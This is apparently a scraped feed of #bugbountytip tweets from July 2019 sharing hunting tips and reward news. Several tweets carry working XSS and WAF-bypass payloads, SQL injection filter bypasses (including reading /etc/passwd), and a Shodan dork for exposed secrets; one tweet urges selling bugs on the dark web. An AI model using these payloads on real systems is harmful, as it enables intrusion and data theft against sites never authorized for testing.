8 SSRF Trick: SSRF/XSPA in Microsoft’s Bing Webmaster Central by Elber Andre #bugbounty #bugbountytip #SSRF https://t.co/WDDlxRSUh2
Deepak Holani
@w_hat_boy


2019-07-30 07:58:38
0 #bugbountytip : Sometime when u come across for specific features but for that u have to pay just go on Google images type company name .. some people put images that that contain end point url which is not under demo feature ..but contain in full specific fetaures
mAshraf
@mAshraf9_


2019-07-30 07:54:07
0 As long as it is a program, a bug may appear. #infosec #BugBounty #bugbountytip #bugbountytips
RHack
@Queseguridad


2019-07-29 23:11:58
0 Akamai Bypass "><marquee%20loop=1%20width=0%20ontoggle=confirm=prompt`${1}`> Imperva Bypass "><details%20open%20ontoggle=confirm(1)> #bugbountytip #bugbountytips #akamaibypass #impervabypass
Jagannath
@SecurityBoy0x01


2019-07-29 15:22:32
0 Spawning a shell : https://t.co/yDo6mISHKt #infosec #bugbountytip #cybersecurity
Jagannath
@SecurityBoy0x01


2019-07-29 15:06:26
1 As I learn about PCI-DSS, I am collating the notes as I go. Here are they if you are interested. https://t.co/QayaJkJVDZ #PCI_DSS #infosec #dataprivacy #bugbountytip
Wh11teW0lf
@Wh11teW0lf


2019-07-29 13:33:36
0 #BugBounty #bugbountytip #bugbountytips # Don't forget for console.log() if alert()/confirm()/prompt() are blocking!
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-07-29 10:58:18
0 Skip XSS filters with CloudFlare{}; 😊 <select><noembed></select><script x='[email protected]'a>y='[email protected]'//[email protected]%0a\u0061lert(1)</script x> #WAF #BugBounty #BugBountyTip
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-07-29 07:50:42
0 (&& = %26%26) sql injection "and" filter bypass %26%26 1=1 #WAF #BugBounty #BugBountyTip #injection #Bypass
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-07-28 23:39:07
1 Chrome XSS byPass: %00%00%00%00%00%00%00<script%20src=(link: https://t.co/Tek0Fh9NMv) https://t.co/Tek0Fh9NMv ></script> #WAF #BugBounty #BugBountyTip
Sul will be at BlackHat
@pwnb0xes


2019-07-28 23:22:54
0 If a company isn't paying enough for your bug bounty take it to the dark web to get paid! #HIPHOPMUSIC #infosec #bugbountytip #getpaid
Aziz Hakim🇧🇩
@hackerb0y_


2019-07-28 21:18:20
0 While hunting a program I got an admin panel sub, eg: https://t.co/2iAH1i18kT Tried many way to bypass but couldn't succeed! Then entered main program's login info and clicked into login! Guess what? It took me to Admin Panel 🤙 #infosec #bugbountytip #BbWorld19 #bugbounty
MrB0LTv2 (தமிழன்)
@MrB0LTv2


2019-07-28 15:15:39
0 A little reward to a lazy guy for his lazy progress.!!😅 Hopefully, Rewards crossed 1st 1000€!!😋 Thnks @YogoshaOfficial 😍 #bugbountytip = Some things will take time!! And Patience matters..!! #bugbounty #We ❤️ #தமிழன் https://t.co/Bk2UeLp5eX
baluz
@haknfuk


2019-07-28 14:51:23
0 @MrB0LTv2 i lik that #bugbountytip
MrB0LTv2 (தமிழன்)
@MrB0LTv2


2019-07-28 14:44:23
0 A little reward to a lazy guy for his lazy progress.!!😅 Hopefully, Rewards crossed First 1000€ Euros!!😋 Thanks to all my well-wishers😍 and yogosha.official 😍 #bugbountytip = Some things will take time!! And… https://t.co/iKQCiQ4wxy
Demolalagos🌍
@Demolalagos1


2019-07-28 14:44:05
0 #bugbountytip If wappalyzer is showing the latest angular version of the site don't think of not getting xss bypass , I used angular xss payload v 1.3.2 on a website using angular js v1.6.4 . Developers does makes mistakes... Hope you like the tip. Happy hacking
Ammar Amer
@cry__pto


2019-07-28 11:44:40
2 when you see a Registration page, during a web pentesting operation you should try discover if you can enumerate usernames by trying to register with an existing username. #bugbountytip #BugBounty
Navneet
@na5n33t


2019-07-28 07:59:50
0 The website is protecting the CSRF by checking the Referer header and then this bypass helps. Successfully bypassed and submitted. Let's hope for the bounty. 😄😅 #bugbounty #bugbountytip #infosec “[Critical] Bypass CSRF protection on IBM” by Mohamed Sayed https://t.co/ZOB0m0odX5
Malav Sharma (Wolfdroid)
@ShMalav


2019-07-28 04:46:13
0 #bugbountytip trust me if it's that easy, everybody would be doing it .
Minture
@minturebr


2019-07-28 01:12:59
0 Use tweetdeck to keep an eye on new writeup, tweets, posts. #bugbountytip #bugbountytips #hacking
m0z
@LooseSecurity


2019-07-28 01:02:19
4 #bugbountytip #bugbountytips #infosec #infosecurity Instead of always using <img src=x onerror=alert(0)> why not try: <audio src=x onerror=alert(0)> <video src=x onerror=alert(0)> Or my favorite: <script src=x onerror=alert(0)>
Malav Sharma (Wolfdroid)
@ShMalav


2019-07-27 15:42:19
0 #bugbountytip If wappalyzer is showing the latest angular version of the site don't think of not getting xss bypass , I used angular xss payload v 1.3.2 on a website using angular js v1.6.4 . Developers does makes mistakes... Hope you like the tip. Happy hacking
Romansh yadav
@Romanshyadav


2019-07-27 14:10:28
8 Think better!. Book your pass for @bsidesahmedabad on early bird discount now. Pass link: https://t.co/psZDqWoxSt cc: @SecurityBSides @niksthehacker @dipenwadhwa @H4ck3rVishal @InfosecVandana @emgeekboy #conference #workshop #Hackers #bugbountytip #researcher https://t.co/adotzHI76s
Max
@0xw2w


2019-07-27 12:59:31
0 Tip: If you have an API endpoint like /api/v2/****/, try to substitute v* with a less number and look at the reaction. Maybe there is an IDOR or improper auth bug #bugbountytip
JR0ch17
@JR0ch17


2019-07-27 06:26:58
1 #bugbountytip for me tonight is always check if I have an upstream proxy server configured in Burp😅
vavkamil
@vavkamil


2019-07-26 18:10:51
0 XSSwagger v0.1 for detecting old Swagger UI versions vulnerable to XSS attacks #bugbounty #bugbountytip https://t.co/1sKKF9Jusn
Petko D. Petkov
@pdp


2019-07-26 17:42:11
2 Everyone is looking for XSS, SQLI, RCE and SSRF. You might get lucky but you are competing with the world. To be successful at bug bounty hunting one should look for those things no one else is looking for, which may seem harder but actually not hard at all. #bugbountytip
mAshraf
@mAshraf9_


2019-07-26 15:00:47
1 When they say the greatest vulnerability in a SDLC is human beings, they mean there will always be a bug there.😋😋 #infosec #BugBounty #bughunter #bugbountytip
bl4ckh4ck5
@bl4ckh4ck5


2019-07-26 12:46:05
0 @intigriti i shortly ago repported a clickjacking as high because it led to sensitive data exposure. just make the transparacy of the iframe very low and let him steal his own information using ctrl+a and ctrl+c and place that in a sepret input field. make it as a game ;) #bugbountytip
SecuNinja
@secuninja


2019-07-26 11:38:25
0 when <svg/onload=alert(1)> is not working, try without forward slash and add a whitespace <svg onload=alert(1)> #bugbountytip
Dhamu
@Dhamuharker


2019-07-26 11:02:24
0 Oracle WebLogic Server Remote Command Execution #bugbountytips #exploits #webappsec #BugBounty #bugbountytip #ItTakesACrowd #togetherwehitharder https://t.co/Vx9MVr0olN
Yatin Sharma
@Iam_yatin


2019-07-26 07:26:03
0 Seats are filling so fast. Don't wait ! Grab your @bsidesahmedabad seat now on early bird discount. https://t.co/UWTb7gRxXJ #Conference #workshops #Hacker #bugbountytip #researchers CC: @SecurityBSides @niksthehacker @H4ck3rVishal @dipenwadhwa https://t.co/AID3v5Thnx
Romansh yadav
@Romanshyadav


2019-07-26 06:55:03
1 Seats are filling so fast. Don't wait ! Grab your @bsidesahmedabad seat now on early bird discount. https://t.co/psZDqWoxSt #Conference #workshops #Hacker #bugbountytip #researchers CC: @SecurityBSides @niksthehacker @H4ck3rVishal @dipenwadhwa https://t.co/YUj5U0dvxd
m0z
@LooseSecurity


2019-07-25 15:53:43
0 #BugBounty #bugbountytip #bugbountytips #infosec I think it's worth replacing alert(0) in all your payloads with prompt `0` as it's an easy way to increase the probability of getting a successful #XSS vulnerability!
{{ '127.0.0.1’}}
@shivam31200


2019-07-25 15:36:32
0 So here <script> alert(1)</script> was popping 1 after trying to steal cookie via this <script> alert(document.cookie)</script> Not working :/ Final payload: <script> alert(1)</script> <script> alert(document.cookie)</script> It will popup user cookie #bugbountytip noobtip
Michele Romano
@Mik317_


2019-07-25 14:04:13
0 TIP: If you don't like small scopes, explore also `out-of-scope` subdomains ... you could find juicy endpoints containing CRLF/XSSI issues, that can be used to achieve a concrete impact also on the main domain :) #bugbountytip #BugBounty #bugbountytips (last one: now)
vavkamil
@vavkamil


2019-07-25 11:09:04
1 XSS ontouch* for mobile #bugbountytip https://t.co/WWyNp0FtYu
Petko D. Petkov
@pdp


2019-07-25 07:17:36
0 Reported vulnerability which allows me to takeover corporate accounts, access email and so on - flagged as informative. You are amateurs. #bugbountytip
h3rm17w0lf
@h3rm17w0lf


2019-07-25 05:15:17
0 Every came across a bug that made you sleepless until you exploited it ? I am working on one such and haven’t had a good sleep since two nights. #BugBounty #bugbountytip
Sarvagya Sagar
@0ffensivemitthu


2019-07-25 00:48:57
0 [ #bugbounty #bugbountytip ] - Oauth Hacks 💰 RFC6819 : https://t.co/8NNpx9sqgN Video : https://t.co/t7oarM6fc6 Writeup : https://t.co/que1GGgBK7 or https://t.co/cIRzuyGO7k or https://t.co/tvwk5MPhSq Cheatsheet : https://t.co/KZxpCODZ3L
plenum 🇹🇳
@plenumlab


2019-07-25 00:14:25
1 #bugbountytip when looking for priv esc read the api docs jump to old versions look for interesting calls and watch out for deprecated api endpoints sometimes they continue to use them for backward compatibility. Some functions like invite, join, create, delete... #BugBounty
Ammar Amer
@cry__pto


2019-07-24 22:30:49
1 you can use the fragments plugin in the WebScarab proxy. to identify the comments in the html source code which may contain useful/sensitve info for the pentester,an easy&fast way to search through the entire source code and find comments. #bugbountytip
pi0wlz
@pi0wlz


2019-07-24 17:29:37
0 if u use gobuster tool for dns enumuration like $ gobuster dns -d https://t.co/ixNnyR6gG7 -t 100 -w common-names.txt -o gobuster-findings, u can parse the output with $ cat gobuster-findings | sed 's/Found: //' > filter.txt #bugbountytip
BarMosseri
@MosseriBar


2019-07-24 14:36:58
0 When you got xss on Hyatt service :) #bugbountytip https://t.co/1oFu9K2Yyr
m0z
@LooseSecurity


2019-07-24 13:47:10
4 One of my favorite #XSS payloads of ALL TIME!!! <input/onfocus=alert(0) autofocus> Perfect for injecting inside of input tags, abusing the 'autofocus' attribute by combining it to an 'onfocus' event handler. #BugBounty #bugbountytip #bugbountytips #infosec #infosecurity
Pedro Henrique Cardoso
@G4L1C


2019-07-24 12:54:07
1 If a sqli target has magic quotes enabled you can avoid this by converting the string to Hex or Char. Example: load_file('/etc/passwd') = load_file(0x2f6574632f706173737764) Or load_file(chars(n1,n2,n2 [...])) #bugbounty #bugbountytip #bugbountytips #sqli
Alin Ciocoiu
@17Akun


2019-07-24 06:24:54
0 Hi. What note taking tools do you use for your projects? Cloud/non- cloud, but free. #pentest #pentesting #bugbountytip #bugbountytips
mayur gupta
@rootmayur


2019-07-24 04:51:13
0 I got 300$ for my submission💰💰 https://t.co/5BcAOrTsHP #bugbountytip #bugcrod #ethicalhacking
Sarvagya Sagar
@0ffensivemitthu


2019-07-24 02:12:32
1 [ What I Learned Today : 03 ] #BugBounty #bugbountytip Indepth Bug Bounty Guide : https://t.co/e89Kne5bWf 💰 Well written blog post by @officialpranj . For Newbies in Infosec - I recommend to read this blog post , twice in a week . ~ Thread : #0xWilt : @0xWilt
Sarvagya Sagar
@0ffensivemitthu


2019-07-24 01:47:14
1 [ #Motivation #bugbounty #bugbountytip #infosec ] No one can spoonfeed you everything You have to do itself You have to be Self learner or Independent learner If you’ve lack of motivation to learn then your infosec career is end here Bcz You’re not going to get far in Infosec
Petko D. Petkov
@pdp


2019-07-23 22:12:59
0 Sometimes it will take 9 months to get your bugs triaged #bugbountytip
Learning Appsec
@learningappsec


2019-07-23 19:00:14
1 Enumerated all the live urls ? next what ? Open all of them at once in your browser using https://t.co/HDt8VcPYSm #bugbountytip #bugbounty #AppSec
Petko D. Petkov
@pdp


2019-07-23 17:52:06
0 Competition is for the suckers #bugbountytip
Proxy
@LinuxKodachi


2019-07-23 17:06:59
0 Want to test your programming and problem solving skills? Here we go : {🕷} https://t.co/QXNsAcMuSL #Developer #programmers #bugbountytip
Pascal S
@PascalSec


2019-07-23 15:04:32
0 #BugBountyTip: If you use an automated Github secret scanner, make also sure to automate the GIT clone URL retrieval. Just created a GIST for that -> https://t.co/TPI4reVPZ1 Let me know if this is helpful and RT 😎
Sarvagya Sagar
@0ffensivemitthu


2019-07-23 14:05:18
2 Hey Guys, Join me and many other infosec asiprants in this group named Nullcrowd - https://t.co/ahMK4OPqkP , The best infosec community. #BugBounty #bugbountytips #bugbountytip #infosec #infosec19 #hacking #programming #programminglife #cybersecurity
d4d
@d4d89704243


2019-07-23 11:47:46
0 Check my new exploit for #image #processing library. This time it is GraphicsMagick https://t.co/OmYiOr2d27 #exploit #bugbountytip #bugbounty
Petko D. Petkov
@pdp


2019-07-23 11:28:24
0 Out of scope bugs are worth reporting - if nothing else you are making a good impression #bugbountytip
midhun
@Midhunryann


2019-07-23 11:24:58
1 @Hacker0x01 bug type :ssrf.. Program :private reward : 300usd First reward #infosec #newbie #bugbounty #bugbountytip https://t.co/KwcO4IP9m6
Sarvagya Sagar
@0ffensivemitthu


2019-07-23 02:02:12
2 [ What I Learned Today : 02 ] #BugBounty #bugbountytip #infosec #bugbountytips How does the internet works : Amazing whitepaper : ~ https://t.co/X3hEqNOUKD 💰 I recommend everyone to read this because this is building block for Infosec 🌈 ~ Thread : #0xWilt
Ameen
@ameenmaali


2019-07-22 22:42:30
0 #bugbountytip: (IDORs) if an endpoints accepts a list of IDs and you get unauthorized for [‘invalidId’] - try [‘validId’, ‘invalidId’]. It’s very possible the validation only occurs on the first element or if any element is valid. Seen it many times
Rubyfu
@Rubyfu


2019-07-22 21:36:20
1 Do you want to bypass Regex based filters? Use regexp-examples gem. It generates a list of all* strings that will match the given regular expression. https://t.co/H42YQhF9na #Rubyfu #OWASP #Pentest #XSS #bugbountytip
bugbountylab
@artofbugbounty


2019-07-22 14:56:43
0 Good references for bounty hunters #OffSec Advanced Web Attacks and Exploitation Resources https://t.co/8zMAn4vtPG #OSWE #bugbountytips #bugbountytip https://t.co/1dMqzPXZij
expl0itc0der
@vanshitmalhotra


2019-07-22 13:07:13
1 A3 - Sensitive Data Exposure OWASP Juice Shop Tutorial - Exploiting Forgot Password #bugbountytip #BugBounty Video Link : https://t.co/wr92be0wXa
Brute Logic
@brutelogic


2019-07-22 12:52:30
4 Use a Microsoft browser like IE11 or Edge. They behave like Burp and curl. #XSS #bugbountytip 😉 https://t.co/xSWgm3EchU
Mohammed Shine
@MohammedShine8


2019-07-22 12:42:29
0 #sqli with no quotes Username: \ Password:||1# #bugbounty #bugbountytip
Khan Sahab 🇮🇳
@UbaidAhmed


2019-07-22 07:46:24
0 Why do many programs do not consider taking screenshot of Credit Card Information screen as a vulnerability? #bugbounty #bugbountytip #infosec
Ameen
@ameenmaali


2019-07-22 07:31:18
5 Been triaging #bugbounty for a couple years and not once seen a XSS report showing impact - I try to do it for each I find. It’s such an easy way to raise the severity with little effort. Look for ATO (email, password change), access to sensitive data/functionality #bugbountytip
ghostlulz
@ghostlulz1337


2019-07-22 00:14:25
0 Exploit development is the new black. Want to get an easy to understand rundown of buffer overflow attacks check out this : https://t.co/FejHKKoPk4 #bugbountytip #infosec #redteam #exploit #osint #pentest #exploiting #security #Assembly #bufferoverflow #apt #hacking #pentest
Yadhavi
@PrincessYadhavi


2019-07-21 22:51:16
0 After upgrading recon-ng to version 5 in kali , recon-ng does not showing any modules. It tells "[*] No modules enabled/installed." How to solve this? #bugbounty #recon-ng #reconng #bugbountytip cc: @LaNMaSteR53
bugbountylab
@artofbugbounty


2019-07-21 17:49:18
1 Get Your Latest Currency Exchange Rates | Refreshing In Every 30 Seconds Mission: Craft a payload link that causes the page stop loading completely through regular expression Denial of Service (ReDoS). https://t.co/8t3nJnhrwr #bugbounty #bugbountytip #bugbountytips #appsec https://t.co/4o3tWcGs4h
pi0wlz
@pi0wlz


2019-07-21 17:37:18
0 #bugbountytip When you run Amass and got a big list with Search engines parse with $ cat amass-findings | sed -e 's/\[[^][]*\]//g' | sed 's/^[ \t]*//;s/[ \t]*$//'
Nikos Gkogkos
@ngkogkos


2019-07-21 11:12:08
1 Love @owaspamass, wordlist masks open so many possibilities! Obversiving already known subdomains and other naming conventions of the organisation in combination with this could help spot crazy subdomains. #bugbounty #bugbountytip #recon https://t.co/n0iap7t4nZ
Rapid Safeguard
@RapidSafeguard


2019-07-21 04:40:21
0 Self contained htaccess shells and attacks https://t.co/U3THkDJ3Ql #infosec #bugbountytip #bugbounty
bugbountylab
@artofbugbounty


2019-07-21 01:46:24
0 Discover Secret Key from a subdomain disclosed via a Github code repository https://t.co/3MVFLLLHze #bugbounty #bugbountytip #bugbountytips #infosec https://t.co/uztLdgrW5E
محمدن
@mwamiaim


2019-07-20 14:03:15
1 Anyone has a good resource for SSRF Payloads ? #bugbountytip #bugbountytips #Bugbounty
bugbountylab
@artofbugbounty


2019-07-20 12:55:50
0 @NathOnSecurity Cool. It's surprising to get rewarded with weak ssl/tls issues. Thanks for the share. #bugbountytips #bugbountytip
Murdockz
@Murdockz_CEH


2019-07-20 12:15:42
1 AWS S3 buckets do not allow for capital letters in the s3 bucket name. Using a tool like @TomNomNom gf will allow you to find all s3 buckets and sometimes they include capital letters. This will allow for s3 bucket takeovers. My recent s3 takeover. #bugbountytip #bugbountytips
bl4de
@_bl4de


2019-07-20 12:14:16
5 Default #passwords list #hacking #itsecurity #bugbountytip #pentesting https://t.co/tldQUMtFDg
bl4de
@_bl4de


2019-07-20 12:11:20
4 #GTFOBins is a curated list of #Unix binaries that can be exploited by an attacker to bypass local security restrictions. #Linux #hacking #itsecurity #DevOps #PenTesting #bugbountytip https://t.co/50z447IFRc
0xd0m7
@0xd0m7


2019-07-20 09:00:10
1 #bugbountytip Sometimes you will recieve a 400 bad request if you are fuzzing with double slash: Solved with a match replace rule!! // > / https://t.co/xTMnrhHOOQ
Mehmet Aura
@rootauraw


2019-07-20 06:20:01
1 Yay! I got 125$ from a PRIVATE program on BUGCROWD for UNCLAIMED SOCIAL MEDIA ACCOUNT using my SCRIPT. ❤️ (https://t.co/BcU0KfqJgh ) Thanks to @bugraeskici #bugbounty #bugbountytips #bugbountytip #hackerone #bugcrowd
bugbountymemes
@bugbounty_memes


2019-07-20 05:49:17
0 Domaim has url :- "Example(.)com/abcd/xyz" ! "Inurl:abcd inurl:xyz" helped me to get internal IP (X.X.X.X/abcd/xyz) I got 50$ for this #bugbountytip #hackerone #bugbounty #bugcrowd
Frederick Alcantara
@sirfreddyal


2019-07-20 01:47:15
1 Quick guide on Web App Security for any developers out there https://t.co/qNO9UUaj4f #javascript #dApp #webdev #php #python #bugbounties #bugbountytip #pentest
ghostlulz
@ghostlulz1337


2019-07-19 17:33:27
1 If you like easy wins go to github and find exposed credentials. Iv personally used this tool on a few engagements it’s great ! #infosec #bugbountytip #redteam #osint #bugbountytips #bugbounty https://t.co/Xf3T7CmWPF
HAHWUL
@hahwul


2019-07-19 16:51:15
1 My toy project! I have now released the XSS scanning library. The name is "XSpear". It is a small and simple project, but I hope it any use well. (Probably a lot of bugs.......) Thx! https://t.co/RNeObHB3kz https://t.co/Xa4zLYKAEq #XSS #BugBounty #bugbountytip #Hacking #Ruby
Rob Fitzpatrick
@rpfitzpatrick


2019-07-19 15:05:57
0 I know it seems obvious. But Slack notifications for your bug hunting automation are a godsend. #bugbountytip https://t.co/4bpDFpwbbB
securibee 🐝
@securibee


2019-07-19 14:02:10
0 When in doubt, upload All The Things. https://t.co/towFxaHpke #bugbountytip #infosec
cybersecurity.wtf
@CyberSecWTF


2019-07-19 13:54:05
0 @Alra3ees Thanks for the share. Replicated in Lab with a ten-year-old subdomain. #bugbounty #bugbountytip #bugbountytips #infosec https://t.co/FZVVCpl4YO https://t.co/xCLont0mcm
m0z
@LooseSecurity


2019-07-19 13:52:55
2 #bugbountytip #bugbounty #bugbountytips #infosec If a bounty program has upload servers in-scope, try uploading an SVG. Some endpoints might block it, but it doesn't mean they all do! SVGs can include HTML/JS and lead to stored XSS.
m0z
@LooseSecurity


2019-07-19 12:52:35
2 #bugbounty #bugbountytip #bugbountytips #infosec When doing a bug bounty always read previous reports. It helps you figure out what kind of issues existed in the application in the past and saves a lot of time on reconnaissance.
D3cy9h4
@DecyphaC


2019-07-19 12:23:53
2 They either think Google chrome is unhackabke, or they taking there security serious??! But will be a result if we do find a bug 😁 #BugBounty #infosec #bugbountytip https://t.co/WJz2gAAT0V
ghost_rider_0x90
@gh0st_R1d3r_0x9


2019-07-19 10:00:47
0 Anyone ever encountered Regex based DOS vulnerability? I saw the vulnerable code but need help with POC. #BugBounty #bugbountytip #bugbountytips
kassih mouhssine
@KassihMouhssine


2019-07-19 09:43:09
0 New bug at @mailru i have bypass the filter and get a nice stored xss i get 150$ bounty but the probleme here the payload just alert(1) nothing else :'( @Hacker0x01 #bugbounty #infosec #BugBountyTip https://t.co/8wPI0fBq0c
Ammar Amer
@cry__pto


2019-07-19 09:37:39
3 i have uploded hundreds of articles about all field of the hacking science as a pdf files to my github repository .the updates will continue to arrive to the repository until it reach 2000 links& pdf files,at any time soon. https://t.co/q2layzVpKz #bugbountytip #OSINT #Malware
Sarvagya Sagar
@0ffensivemitthu


2019-07-19 05:15:22
5 -- "Fall in love with Regex” by Sarvagya Sagar https://t.co/bsRojqvuXy : This article willn’t give you a magical power . Main purpose of this article is to serve as an first aid to newbies . [ #BugBounty #bugbountytip #infosec #CyberSecurity #bugbountytips #hacking #programmer ]
cybersecurity.wtf
@CyberSecWTF


2019-07-19 01:25:12
0 @HusseiN98D Congrats :) Always love that find. Replicated it in lab #bugbountytips #bugbountytip https://t.co/PEpNpJXjqr https://t.co/tJGRT2OJ3u
healthyoutlet
@healthyoutlet


2019-07-18 17:43:21
0 #bugbountytip the careers section of a website can leak information you might not find elsewhere. If they're looking to hire someone who has experience with some tech you didn't find during recon that might be a clue where else to dig.
cybersecurity.wtf
@CyberSecWTF


2019-07-18 14:45:45
0 @cnotin Oh damn. That's a good point. Thanks for sharing. I've made it available for practice in Lab https://t.co/W0YH06Fp6o #bugbountytip #appsec https://t.co/AmBsGsvy1Z
Sarvagya Sagar
@0ffensivemitthu


2019-07-18 05:41:54
0 [ #BugBounty #bugbountytip ] -- 💰 CRLF Injection Attack Vedio : https://t.co/5CFxKKosiG Writeup : https://t.co/ZO8QytNJ42 or https://t.co/MmKNu3hMau or https://t.co/rM8kZu6GHP Cheatsheet : https://t.co/EnybRyA7AA
ghostlulz
@ghostlulz1337


2019-07-18 03:55:59
1 Winner Winner Chicken Dinner. If your not using the waybackmachine to find vulnerable endpoints you might be missing out on some bug bounty money. More info on my blog: https://t.co/IcaV2mPjQV #BugBounty #bugbountytip #bugbountytips #infosec #redteam #osint #waybackmachine
ph0rensic
@ph0rensic


2019-07-17 23:49:47
0 Shodan search RUBY DEBUG html:"secret_key_base" html:"rack.version" #bugbountytip #BugBounty
sagar yadav
@sagaryadav8742


2019-07-17 20:08:54
1 3rd bounty of this month 😊😊😊 It's time to plant some new tree's 🌱 Secure_website and Secure-nature #bugbountytip #bugbounty #bughunting #bugcrowd #hackerone #intrigity #BountyHunter #bounty https://t.co/fd60QKMJXj
SaadAhmed
@XSaadAhmedX


2019-07-17 17:40:54
2 Thinking of making a RECON web based tool using flask + python 😀 Need suggestion what you want in this tool please share ideas along reference 😉 #BugBounty #infosec #bugbountytip #bugbountytips
healthyoutlet
@healthyoutlet


2019-07-17 13:35:15
0 #bugbountytip There ARE bugs that haven't been found, just keep looking. https://t.co/dQmf6tzHbY
Sarvagya Sagar
@0ffensivemitthu


2019-07-17 13:30:41
3 [ #bugbounty #bugbountytip ] - HTML Injection 🔥 Intro : https://t.co/CVABpaoutF Video : https://t.co/p3EsNso7y3 Writeup : https://t.co/sZ6CGqcuW8 or https://t.co/wG9l0Bhh2v or https://t.co/TJZQdVe9dC or https://t.co/XXsHNAO8ob or https://t.co/o2MQEj5buw
Ishaq Mohammed
@security_prince


2019-07-17 13:19:12
3 If you have your input reflecting in a javascript variable simply close the context with </script> and start a new <script> tag for #xss thanks to @s0md3v @brutelogic for sharing thier awesome research on xss #xss #bugbountytips #bugbountytip #bugbounty https://t.co/DRtHXi4TFB
Evan
@evanricafort


2019-07-17 11:48:15
0 Fun #BugBountyTip: distribute your blind-XSS payload to any of your target and maybe one day it will fire up on their end if they will be having a end of quarter checking/validation :p
Samet ŞAHİN
@sametsahinnet


2019-07-17 11:46:41
0 A simple #BugBountytip about deep subdomain search : Google dork > site:*.*.target.com #BugBounty
Dhamu
@Dhamuharker


2019-07-17 07:16:51
1 #bugbountytip #bugbounty Story of my Biggest Bounty ever : Command Execution on Jenkin https://t.co/GtJFtgKw74
bl4de
@_bl4de


2019-07-16 19:52:17
1 Sometimes, when you run off the ideas, it's good to back to basics 😉 #bugbountytip #hacking #webappsec #WAHH @PortSwigger @DafyddStuttard https://t.co/zatsQY45MC
ΡRΛSΞUDΟ
@praseudo


2019-07-16 19:33:33
1 Some android hacking related #bugbounty #androidsecurity #androidhacking #infosec #bugbountytip https://t.co/agYj45YgSe
Dan Field
@Surfrdan


2019-07-16 18:41:43
0 @nahoragg @Hacker0x01 Nicely done! And great #bugbountytip in the thread. Monitoring is key with large scopes.
Leonel Emiliano
@leoalgare


2019-07-16 13:35:19
0 Yay, I was awarded a $700 bounty on @Hacker0x01! Reflected XSS + unrestricted CSP leads to account takeover. (High severity) Weaponize your xss payloads and show the real impact #bugbountytip #bugbountytips https://t.co/UA8jUEN1ss #TogetherWeHitHarder
cybersecurity.wtf
@CyberSecWTF


2019-07-16 12:24:22
0 @0xInfection Now available for practice in lab https://t.co/Zp8nolQIhq #bugbountytip https://t.co/1LyHcMD6JR
Shammah Agwor
@Zealsham


2019-07-16 12:20:56
0 If you query a Jira api endpoint and you are getting an empty result , try to find the jira login page of your target . A temporary session cookie with will be given to you . You can use this to query the endpoint and get a valid result #BugBounty #bugbountytip
Brute Logic
@brutelogic


2019-07-16 11:41:15
2 Check this writeup! #XSS #bugbountytip https://t.co/BNFapWjYqg
Mads
@iGotRootBlog


2019-07-16 10:47:07
0 Reading manpages can teach you so much. Just found out you can get exploits from a XML nmap file through searchsploit Example with verbose flag for real time results: searchsploit -v --nmap nmapfile.xml Time to automate this? I think so! #bugbountytip #pentesting #bugbountytips
YS
@YShahinzadeh


2019-07-16 10:00:21
1 site-a has open redirect limited to site-b or x.site-a. The browser will keep the # of URL. site-a/?url=site-b/path#payload -> site-b/path#payload the same for x.site-a. You might take advantage of full redirect and stealing an auth token #bugbounty #bugbountytip
SaadAhmed
@XSaadAhmedX


2019-07-16 07:20:45
3 Here Is the Write-up how I use Click Jacking to exploit CSRF https://t.co/o3mNTG47U6 #bugbountytip #bugbountytips #bugbounty @Bugcrowd
Sarvagya Sagar
@0ffensivemitthu


2019-07-16 06:30:58
1 [ Capture Session Token ] wget -q --save-cookies=cookie.txt --keep-session-cookies --post-data="username: admin&password=pass&Login=Login" http://target/login.php #BugBounty #bugbountytip #bugbountytips #infosec 🌈
Shammah Agwor
@Zealsham


2019-07-16 00:45:23
0 Let’s not forget that @yaworsk started this whole streaming thing with his PRO TIPs series #BugBounty #bugbountytip
cybersecurity.wtf
@CyberSecWTF


2019-07-15 18:25:52
0 H1 top 15 most common vulnerabilities #appsec #bugbountytip https://t.co/wqsqrUeibX
Abugzlife
@abugzlife1


2019-07-15 14:33:12
6 New post about the not so special bugs out there. Hopefully this will help motivate beginners that are struggling to see the light at the end of the tunnel, and show some of the very simple, impactful bugs out there. https://t.co/Ti0DlwgYR8 #bugbounty #bugbountytip #infosec
[email protected]řķ Kňığhť
@eye100_eagle


2019-07-15 13:04:07
0 $500 000 Bug Bounty Campaign https://t.co/ZdytT3Pg8D #bugbounty #hackerone #bugbountytip #ItTakesaCrowd
Emre Selim
@emre_selim8


2019-07-15 10:02:03
0 I was 2th hacker at Hall of Fame of Ford in 3 days. How did i do this? 😋 #bugbounty #hackerone #halloffame #bugbountytip https://t.co/1rt3KpZCWs
Tismayil
@Tismayil1


2019-07-15 08:18:35
0 Good Weeks. #bugbountytip @Hacker0x01 https://t.co/xJfdyCvm5r
Wh11teW0lf
@Wh11teW0lf


2019-07-15 06:44:20
0 #bugbountytip Always visit Out of Scope subdomains and domains to get new endpoints for In Scope targets!
ghostlulz
@ghostlulz1337


2019-07-14 21:29:10
1 Do you like hacking? Doing you like learning new offensive security techniques? Do you like making money with bugbounties? If so check this out: https://t.co/pAdnbe5VeU #BugBounty #bugbountytip #bugbountytips #infosec #redteam #dfir #Pentesting #hacking #hacker #osint #offsec
Th3G3nt3lman
@Th3G3nt3lman


2019-07-14 15:02:21
6 1) Amass one of the new target domains, nothing good 3) Search github and found a subdomain "k8s" 4) The site responded with K8s clusters names & details 5) Added the names to altdns wordlist, Run 6) 4 subdomains appeared & unauthorized access to K8s Dashboards 😅 #bugbountytip
bl4de
@_bl4de


2019-07-14 08:11:09
2 Here's why manual exploitation will always win with automated tools 😬 Also, here's the reason why you should read #bugbounty writeups 😁 Great catch by @h1_sp1d3r inspired by @gerben_javado post #hacking #itsecurity #bugbountytip #searchingforholes https://t.co/NipaLOv8D7 https://t.co/qrIF1uW6k8
Richard Strnad
@NateTheRiver


2019-07-12 13:37:29
0 Pretty useful when you forget to start some long-running scan via nohup command or in tmux/screen session. #bugbountytip #bugbountytips #Linux https://t.co/ofhPGEpzEv
Sarvagya Sagar
@0ffensivemitthu


2019-07-12 10:20:21
